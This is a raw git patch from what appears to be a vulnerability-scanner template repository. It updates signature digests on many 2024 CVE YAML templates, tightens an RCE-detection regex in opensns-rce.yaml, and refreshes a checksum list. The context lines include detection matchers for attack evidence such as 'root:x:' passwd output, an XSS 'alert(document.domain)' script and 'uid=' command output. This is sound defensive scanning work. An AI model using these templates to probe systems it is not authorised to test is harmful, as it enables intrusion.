4a0a00473045022100e0979daa200c98a79c4fce03c2de552e7e6b4dd8f9e8eeef99953fb2798f99df022016380198586e765e34ecc925177589ab2aff90201a5f02bdff0ce745fb81ee5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22319.yaml b/http/cves/2024/CVE-2024-22319.yaml index d2f4fe807d..71a859f4ae 100644 --- a/http/cves/2024/CVE-2024-22319.yaml +++ b/http/cves/2024/CVE-2024-22319.yaml @@ -36,4 +36,4 @@ http: - 'contains(body, "patchLevel\":")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100bd482d70c6c93cf274bdde0ad6aefa255e1e20edcff44034afb21a45d3fc96e802204f0c9289a94160d4606e60e859ca554ead9d6b21a8441a9d9bf065ec7f9f3cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206863aa5b7da352d26b89fcd6e35a46e44dfa7f91bb2ca228c4a923e133eabd3d022073888ea7ac5cf67513056508ed63ce310cb36d3c9501172574f0ce4dd389e9dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml index 3da874ab23..650fcab2c0 100644 --- a/http/cves/2024/CVE-2024-22927.yaml +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220478cf55dd8920fb6cef6048870359141244744e6fd3b3fa26652c5c3440ee8080220629a2ff1f955e8ad2147df65ebc9b82b067fbdc5cb27ebbf650f8106928ed172:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f09b876bffc9bf19fef23c0132b906e61dad6194d544af49d2ebe2e55461d5810220763e5580653e88278ab1d2571df408542dd92b59b9f7be3212fd27693d4f1bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-2340.yaml b/http/cves/2024/CVE-2024-2340.yaml index 8411fcbd94..66df150960 100644 --- a/http/cves/2024/CVE-2024-2340.yaml +++ b/http/cves/2024/CVE-2024-2340.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210086a9d9e4d491bbdaf66cc96f24d32ffa31c10df273bab32f91385760014d579b022048d3aa9fe3beec267bb552efa870d3ac9644d1501b28f39ab998dbef346ba1dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ce1ac8b2838d3f39573c0dad38b90d092fc30429472656baf03db2659983c79022050f63a92a5a33033e109adbb6e973ac87138adb868fa226c73e064fb461a5424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index 6ee3fb94af..4b5538ffe9 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -71,4 +71,4 @@ http: - "contains(content_type,'application/xml')" - "contains(body,'<projects href=')" condition: and -# digest: 4b0a00483046022100f2ab25f2474d2b66f27eac34cf59dd749516c75af1ec18933a8a2040ed0661a2022100b5fe19d35dcd8e849f3543cdde3db3a38866b8f64bf3c216f156ec0daabf27c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022042ca57e91002eeb95a0974c5cd85344b00d8168df68b416ab82e02dc3fdf729c0221009dc47418fd94b57d224080240cf710c7b669b600f37a6cfb92a1b1f75880b62c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index 1d53daef76..85820d38e9 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a70e9370453935e96c9943ac035762c4f44bcaef30ad4b00ec48e58072ccfb00022100c2c66dd4e2b80a25bc7b8730d7f65343a45419533e5a521290e890f52352af77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022020f676dd7f70abc3d6a1d63bbd9c429e82c76b006a9b56d43a858050223f5b99022100a3dbccc48bd76c7a8f160c72ba8cbc13307a3663abebb859d6a22bd8a44683e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 212090615c..4ed2a49243 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204c9518dd059877a34844f2e2842d83fd41e2ad0697ab8806694bb9de593e5d4902210097a7f34cde999f290f86e0ea7544cfc1279e367211e05a8f2944fd8c46d352f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200cbd9f1fc5ea98e5649de5e1b43d62d38241188c12d1f4cf19709e2b2aab31a50220643a5fbf43545d89dd02819e0e92ee7fb898212836c04be5c18d446b1950705d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml index f38f1da37a..4a66b1aedd 100644 --- a/http/cves/2024/CVE-2024-25735.yaml +++ b/http/cves/2024/CVE-2024-25735.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207a882963d4a3f8ed561c7c8c0babf15f2b40b9dcd1aa09112156fa30a9e53b89022100a0a1e3ee792bbbe946761e559cb03fe55fb5b61de9e9eafa674e7cefeaa34a68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094aa267e9fcefa3b5cf6035541b466cd9772aa5cfe6735980c1bd6d4f2c481d9022100c63d8c195e067f627d83b89909d50cb22d9b5f1c25edc5d8fb8edad4d04458cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index f142818e0c..749842e403 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210080910a3943e4988be013115a405cba6b2a3ebe196ba7484f7880a73f52e5134f02201aecddd5947b597c5263b214739ac08884025c217e2c5460e5e8f56cd60e5c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f98d8732efab432fb4a5776fb0cffdfa3bab1be29596883a3f08213b7a32c77022051ca3c0c66461b6fb3cb1c9ccbd1040c30467f4e59e830fd2bdc7f88370b331e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27198.yaml b/http/cves/2024/CVE-2024-27198.yaml index 16cc2426d8..6b5009efa5 100644 --- a/http/cves/2024/CVE-2024-27198.yaml +++ b/http/cves/2024/CVE-2024-27198.yaml @@ -42,4 +42,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "buildNumber", "server version", "internalId")' condition: and -# digest: 490a0046304402202c6f5201162870b8740cba1e24a1a2c07ffbfaffd2ec2014089965be490e0160022058c8821bc89e13c81538085bf8725658320ee8ccebb2ecade3d9755cd2a79e00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028b6be218203626d48f0b0865d2531c617d75554ef795f70ae685e3055bb57d102200d791cf8dd53b096852970c4907cedf2d11bb1e09ae7990dfd78422b2180037d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index 6edaacd41d..bf14bf8963 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "application/csv")' - 'contains_all(body, "DATE", "ACTION", "KEYWORD")' condition: and -# digest: 4a0a0047304502201afc1791826e1697d3a3aa1c115b03d228037f7e7725cbc1dc25dc3f37fb6798022100d14a7854e82d1afb46b5a04a8b6c429cf8ab2b7ce9fe9c11967a23d4519f7986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059d16ddd969cd0cc9c7c05d5ca2d66a1a4e5631bacd4815549a048eee5cf121702206ea54044b56d493bf48811a0def2447e3780f5783796e6a33becfcb9a2bd9d88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-28255.yaml b/http/cves/2024/CVE-2024-28255.yaml index 5d6038443a..646126ef44 100644 --- a/http/cves/2024/CVE-2024-28255.yaml +++ b/http/cves/2024/CVE-2024-28255.yaml @@ -43,4 +43,4 @@ http: - 'contains(body, "java.lang.Boolean")' - 'contains(header, "application/json")' condition: and -# digest: 4a0a00473045022100c0396d7d2cda35db57fec494cace654bac870c3441e8062bf8d202f35ccbf1e9022005757044cea4c00fe5c637c2d8134c5542795f4f41eeb6abd464db998a20471a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba11d3498335ba1095da089f921bbe787ab7593a167794e6a318a940266c1852022100d866d668b6450e6b6a42dc1647a952564100f36d7e7cb5e1092d2070312ec863:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-28734.yaml b/http/cves/2024/CVE-2024-28734.yaml index 6590760ff5..9c9ae66d4e 100644 --- a/http/cves/2024/CVE-2024-28734.yaml +++ b/http/cves/2024/CVE-2024-28734.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220639152ac7101721af13e0f678be3f3ff7cf9b440afa2e13e5691cc2c62e3ccdf02207da7b95d3c2610f4b7d80e42eb444efd95d5f30f992d0335dfac80d9f72719c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201aaadc24cf45d9dfb1bf02a74d4c050dee86630aec998cf9fecb300af3c80b81022100a732dbb88437b2e94b89d4ad56fe2bbe5ce339d77a292639376b049919c7e896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index a52bb5c2b4..f07dc24c46 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -55,4 +55,4 @@ http: - status_code == 200 - contains(body, "<script>") condition: and -# digest: 490a00463044022018e9ab68758dc46b0e8fa4a2f179139d263576514965c9076f0c2900381f4ef802203e45ad59adc22e90a0a05978f10e22f9158338cd41c4d07900229bb50ff24dc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093a5b04866b078b807cfbd803744ae129e205970fc34c73f9973d5bfabdd2355022100ddc08432b37d7c1696f3d5b2e311091d4815737e67056280e524abc9c49b4f3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-29059.yaml b/http/cves/2024/CVE-2024-29059.yaml index 92a8ee3e7e..17e84f392e 100644 --- a/http/cves/2024/CVE-2024-29059.yaml +++ b/http/cves/2024/CVE-2024-29059.yaml @@ -78,4 +78,4 @@ http: - "contains(body_1,'ObjRef')" - "contains(x_vuln_test,'{{randstr}}')" condition: and -# digest: 490a00463044022075eae4fa0532f3bf10a0c94bd222dc4fd59b85ae03a5e0d02f2cd542a4069e5402206cfa5cdac2a1493b73fd82d8668018e591c958cf6d0dfd4e44786def094a509a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220766c9dfdbd7c65d458c73a8027ecca8ee56bf3dec4557d50ad109a37973b1c73022100adfdf589102d64e02c957796c152d64d392744895647a56b7d61d9b1e041b61e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 187f9319f2..7b7d08c32b 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202588a25e1042a61777bdb84f557b67a9f93b51713a37c41b28d81bbedf12324b022100c4770f328e89c8c133189d9c7d74131d77f77ea05e218d41dd03e4917674b2ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b5117d474664154b7b9b2b8f2c14284599c81fcbe172df27d9793b3b4a8d65602206c4b5689c81e4a2e53e1e5917aa6e6dd97595c1d5a8c1313772ee7aea8d2473d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index e8e1642a26..4caca5cfd7 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d937a4e33ba274ac20f1c8201f9a5ec5053252381b066f6ca34efbb0357112c5022100c5aa25daa1dcadea9076b1bfd0c414c26fd500c71e46d3e56461e1ef6be67149:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200580ebc91fbdcc0e60ee951ef840f931255129d83c455327d2b43c2da2c42c67022100a1d7c4877dbfdbdca2f30aea0099503a024334a4e4cfec758cd9b8700f49c3e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3136.yaml b/http/cves/2024/CVE-2024-3136.yaml index 2e7bdcca6a..d77f57b538 100644 --- a/http/cves/2024/CVE-2024-3136.yaml +++ b/http/cves/2024/CVE-2024-3136.yaml @@ -59,4 +59,4 @@ http: group: 1 internal: true name: nonce -# digest: 4a0a0047304502206e33a2d814c15125c07d788ddd3fa86d8d8c00963ff4ee67ee6978b537395c2e022100c3dbee7b576104e81ce534ed2e9bcce2296b7a6ffeca66acde35e5d081bb93d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b763dd72807cc252360a0934574e10db71e534d2dcb99664ef0d64f8e8a248002210097d5a1eaeb56e1c3c6b1f836e5c15a210596a30c9af148de0c5ee5b15b9e927f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31848.yaml b/http/cves/2024/CVE-2024-31848.yaml index 63cc3fa62d..e05cb2e160 100644 --- a/http/cves/2024/CVE-2024-31848.yaml +++ b/http/cves/2024/CVE-2024-31848.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207716de1b37106fd74b61c49cce61a5d2f0c123e701fc9e66b91a52b18a37ea2a02200cd509769de5850cafe5c0d9c721ec1c13740712ac9e7a26abe2917eddf7b9e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f60c280d7939cdf6b9764473554ef08e27b39bc7a89269b236a5da5edebf2fcc0220595629ffc7c8ac007cf49020d64692109e9ac850c921d72f04ac2ba928314dec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index 3879c0511b..7b52a6f010 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206306def4e2e9bd849a9223859d49dc3876b05ac689c4018361bce890427600d7022100f74718e6db0689ac6ce5206fc0b57545354477d87c84d0b8c6d3a3ff7524fdce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220350a856e04e48e23fe92d6383c1292fd9ec12afc4abe82ff10a7113ce0bd063602204757c78c4c1d5f0dba539eab295cf5a3beb8a0379c05189b7939ce27c38eccc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml index 9b18e3423e..5b2aef20bb 100644 --- a/http/cves/2024/CVE-2024-31850.yaml +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a90aacad9d50c7b4f889f1ea7226b29388df438d5644c28822dc4a2715f9490502200ea6c2b15395f98c3499bf87ddb3dea4f98de351105b8418254967fc47e7c3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd99b8c05029378ef0f9167eea055e01f7fd30120908e870d3c8630899512f8f0220219632a880b9347a2f3e03d3640aa1ac332329928fe54c97d522fe72445c18e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index 0eb5208772..403d19dac2 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -33,4 +33,4 @@ http: - 'contains(header, "application/octet-stream")' - 'status_code == 200' condition: and -# digest: 4b0a00483046022100c68ae449c313523a338ad0b181aaa41e15eda98a9b200d3ed208a44ae24127a6022100e2c5a881638a9019355b8922941feb90086ba1dfe4d8175bfd566c3122caf772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4e4fec406f9745a3ec5ab8ef88a44a13b351b1b3c8a4148416cf83776e7632c022100a63559fdc8153e058c817e01043c453e8af311de120d56c15030608f4b5c5598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index 1b1d0864ab..459f1a577c 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7987354e025dbc03f2e1afa23c2973af3ef684babd4e5fd110f4a90f06083ab022100fb410f784e3b4a10502077ab8b122e04039b29dea9df90707725691983bfe80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072033feeeb4826d2bee7c874213d2df871af8bf13afc1f3c980f299181f16f62022029ff80065f468b347cdf1c0833940b14cb59adce81580ba0ae7e1771cef64f17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index dc989fce6e..b24121f056 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -38,4 +38,4 @@ http: - 'status_code == 200' - 'contains(body, "um-debug<br/>")' condition: and -# digest: 4a0a0047304502200273cf6345bda7ae0f53bba3ecd04ff070ee62c82b146898fc2a612f9363f6d602210087a74005c7a282fc34b4d12bdbe7fe68c141019e1ab85581d000d319aeff2fd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbb0583fe89fcebeeb2230544ab50b45edc164b04b429997fe398e1f6cfb1670022100a8e7242f47dbf36e5d828171cd525c4c7c76ce5e97ad9fefa5f9f3e5c77cab50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index ae77343cca..c7cf477b96 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -47,4 +47,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "<script>alert(document.domain)</script>", "SOPlanning")' condition: and -# digest: 4a0a00473045022100b2ba794854d39f477eba7ecc4a2ef4a49c3994da43c6768fa8b7833d9ff576a8022036b5166302b1717b96a5fbae6062df8b924ee738794571eae1eb2fe2aa69dc55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6bc5b2793ecbad05e108bd81bbd41b4b22e58e61837998f0f6a2aacb1af3dff02203c428c70431c5b3c1cbc7ca7641dac68dab0d4cd1b99ea4023ac9950ec713dee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3400.yaml b/http/cves/2024/CVE-2024-3400.yaml index 4582984158..5b916b447f 100644 --- a/http/cves/2024/CVE-2024-3400.yaml +++ b/http/cves/2024/CVE-2024-3400.yaml @@ -54,4 +54,4 @@ http: - status_code_1 == 404 && status_code_3 == 403 - contains(body_2, 'invalid required input parameters') condition: and -# digest: 4a0a00473045022100a1480b0b832bef7655fb52c49ae84122e9cabdf34c766e029002770e55073ba302200f1affd9a0d6cae40b943d774c8aee1af443981c4240f9ed87422a732fd69130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097e7c06d535f21e4ee301a8bf020f8f4a5a6667b450ceb48d188567cc43459210220349129284fd3663abeb841c36f44ecd03d773aa19eb89af9da6cfc82792d49cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index f1cc825297..d821c13c56 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -122,4 +122,4 @@ http: part: body words: - "root:x:" -# digest: 490a00463044022034365345ca960cac174d54cf353f25ea720b065bf9bd3d8e354696368908c0b702203f998746363311340e85f3d692227a4c849f84ebe03837ea3004486821b6e19c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022016f9960caefebe9812cebc8ea4a19c3818eca4e22ee5d653c3c651cb21120fae022100abc41e3e04f0659ca3c47dfff8554f225c6019f4541021d02307c5fc01c1ecf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index 3db7899504..b4e1655549 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204d3f2a0f97eb7ea7fe180e934519026ed231f12223669f51926597f7209ee4a402201edf5e99628b2435af3325bf2f7cac5db876ef8960118f25a1b0cbe87998d6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a145e39458a5bafa9946a183c0148736e45daf0ec28820e8c442fb5684d901a102206a30ac5570efedae5b2847a92e5cfad3a5d1cfd71dfc2ad82563d2e57ec9dbd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4c1a802a8babfc7399d30153117725f5015f17eb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 1 Jun 2024 14:28:57 +0530 Subject: [PATCH 566/847] Fix FP opensns-rce.yaml --- http/vulnerabilities/other/opensns-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/opensns-rce.yaml b/http/vulnerabilities/other/opensns-rce.yaml index 04d60d8bd2..24fa77d4b2 100644 --- a/http/vulnerabilities/other/opensns-rce.yaml +++ b/http/vulnerabilities/other/opensns-rce.yaml @@ -25,7 +25,7 @@ http: - type: regex part: body regex: - - "((u|g)id=)" + - "uid=([0-9(a-z)]+)" - "Microsoft Windows" condition: or From 3e42ca0e6b06eb414f79f1ea1e5e9069a46c58ee Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 09:05:35 +0000 Subject: [PATCH 567/847] Auto Generated Templates Checksum [Sat Jun 1 09:05:35 UTC 2024] :robot: --- templates-checksum.txt | 3632 ++++++++++++++++++++-------------------- 1 file changed, 1816 insertions(+), 1816 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5245076309..22cfdb7e6a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -894,2426 +894,2426 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:ce532c48b5e65624cefb884818 http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:24e33df8f32dc3625dd9ae3f8e98055a47dfeedd http/credential-stuffing/self-hosted/grafana-login-check.yaml:0b82037ff4e9c72df81aa93d7c7f5c745866c664 http/credential-stuffing/self-hosted/jira-login-check.yaml:968e46885f51c77a83c0698e59e96c37b37ea8b8 -http/cves/2000/CVE-2000-0114.yaml:cde077e4cc4205ac3e06b13137f1882f457a3231 -http/cves/2001/CVE-2001-0537.yaml:fbfbd1e2d066d791fe2a6676ff00e50e85265fbc -http/cves/2002/CVE-2002-1131.yaml:a3c7f79b103646e11a8da3cf2a22094452e459a3 +http/cves/2000/CVE-2000-0114.yaml:ebdf6c20a94e575096700e3a5a2bcb88c9995708 +http/cves/2001/CVE-2001-0537.yaml:e43dc67ef6870c9cffcb40b31631f7cd128b4e9f +http/cves/2002/CVE-2002-1131.yaml:be017258958ebe468f86e0f0d1a2500fd26ae77e http/cves/2004/CVE-2004-0519.yaml:7968af9d55ad3d7db45d4978c04830f4b81a26ed -http/cves/2004/CVE-2004-1965.yaml:5da4f328bccbc13de52a9cda87bb775aaea45595 +http/cves/2004/CVE-2004-1965.yaml:1f20050eb605b78c6c0307155707e90d3c3a5cd5 http/cves/2005/CVE-2005-2428.yaml:014d3a09f56e144c520b80336166df118252095d -http/cves/2005/CVE-2005-3344.yaml:fb49ecd39f4b35179e4c70e42dbfe1fe66621b78 -http/cves/2005/CVE-2005-3634.yaml:fb7899762957cac6b841ca1ab13e38e8607989d8 +http/cves/2005/CVE-2005-3344.yaml:54a7b30968e8eff300d74083651ac78ba54a6b61 +http/cves/2005/CVE-2005-3634.yaml:f64b8d12db340de3b554370d43c4ac36123ad73e http/cves/2005/CVE-2005-4385.yaml:20057d0cba302dc1bad5953124947e0267033c89 http/cves/2006/CVE-2006-1681.yaml:3dab8b5c90252f5c915312e7ad02426c2d60f98f -http/cves/2006/CVE-2006-2842.yaml:79af29153d57a8ab320e48e514308b5969d50793 -http/cves/2007/CVE-2007-0885.yaml:efbc944aa9eb01d384f65a4006bafb08434a249f -http/cves/2007/CVE-2007-3010.yaml:c5b1830593514312a48ab6f5b6bd184fda184644 -http/cves/2007/CVE-2007-4504.yaml:709bbb828ede5998c8222d8f5f25bfec65de3629 -http/cves/2007/CVE-2007-4556.yaml:47f15309aea6f64a71100bdcac276fd7b60a5a1c -http/cves/2007/CVE-2007-5728.yaml:694fbdd17183242f9d3bc3ef45c6d912d363fe32 +http/cves/2006/CVE-2006-2842.yaml:7d75e13cd3030dbbb90b65d37f4958dc32d7945a +http/cves/2007/CVE-2007-0885.yaml:2bc9559f910da5a0f99cf4412fe56ab526bdb039 +http/cves/2007/CVE-2007-3010.yaml:54985bb083d5dc7ff5ee07783055c8b3e0fc4671 +http/cves/2007/CVE-2007-4504.yaml:09f70f7c4bd05d9a2f38874308b2b97a0f22547b +http/cves/2007/CVE-2007-4556.yaml:74d58c6684bd7085f1b675e0fdb910c9bf5f45c9 +http/cves/2007/CVE-2007-5728.yaml:5a78fc32243b74fcc77e3bb6d6949c9d93613ee8 http/cves/2008/CVE-2008-1059.yaml:a6e88a29e1382a7a92d2465b513ffd1223d870b9 -http/cves/2008/CVE-2008-1061.yaml:cc5934daa30075510da0ff11325518ae3f17f298 -http/cves/2008/CVE-2008-1547.yaml:dc4f20c357b0117d721a81265352ba6fda6261d1 +http/cves/2008/CVE-2008-1061.yaml:4c857ca420e45320722618ca7441c47710baac67 +http/cves/2008/CVE-2008-1547.yaml:aa5fbd3a9c8e154c2961e798b1e2a7e676b1b80b http/cves/2008/CVE-2008-2398.yaml:f5c4cb5d6dafa0a882eae29c89bb6a3982ba69a4 -http/cves/2008/CVE-2008-2650.yaml:d53dd7bfee4c739dda510e5ee2eb613dc697cba3 +http/cves/2008/CVE-2008-2650.yaml:855fa8c9bcca0355512690ec9869315ac1096d81 http/cves/2008/CVE-2008-4668.yaml:dd5527612e924d9a59ac3c58c998cacc8e70441c -http/cves/2008/CVE-2008-4764.yaml:63ba6b935c0bc87ae3438339221d4abf72d7a40f -http/cves/2008/CVE-2008-5587.yaml:c969a2f642a97ab738fb778c8cb11abf2f2d35be -http/cves/2008/CVE-2008-6080.yaml:34bc601e2cae9ecfc1d3f364787e95cc3025847b -http/cves/2008/CVE-2008-6172.yaml:c4f0f39106b0ec3b7ee708f17269d7b119486ea4 -http/cves/2008/CVE-2008-6222.yaml:48c6332172c9f3e7108ae6845e1c7a62d702281e -http/cves/2008/CVE-2008-6465.yaml:f2b2f886234800bb98db1ab9c3838867de620f3f -http/cves/2008/CVE-2008-6668.yaml:5db9e940887500dacc04bd5d9e64b078cf83e2fc +http/cves/2008/CVE-2008-4764.yaml:b61a8db01efa92c650b4605cabcf023653e9f153 +http/cves/2008/CVE-2008-5587.yaml:b8c1f9c0b62c60dc47344371249cdd346ab6fe33 +http/cves/2008/CVE-2008-6080.yaml:4d19f123f5d5b550ed9a60f9115032044bd3e508 +http/cves/2008/CVE-2008-6172.yaml:1b69d725cbe082350970da03b78cb1ab9616ae6f +http/cves/2008/CVE-2008-6222.yaml:49c094908bc759b30d38a2239f3f7a6cad5d51cb +http/cves/2008/CVE-2008-6465.yaml:ee456b5fe4464d4f0ebf0caad6ffe86c64d02f75 +http/cves/2008/CVE-2008-6668.yaml:9a26a2081b16686c196e3d556cd05fe9a39373d9 http/cves/2008/CVE-2008-6982.yaml:ec7e061e851cd73e256f6cc2b73658bf631d9bc2 -http/cves/2008/CVE-2008-7269.yaml:74a76cbd660b63a451ad28b5c6e499d603951fcd +http/cves/2008/CVE-2008-7269.yaml:99d96962951649254ec5aa0c310c1123f8bdb4bb 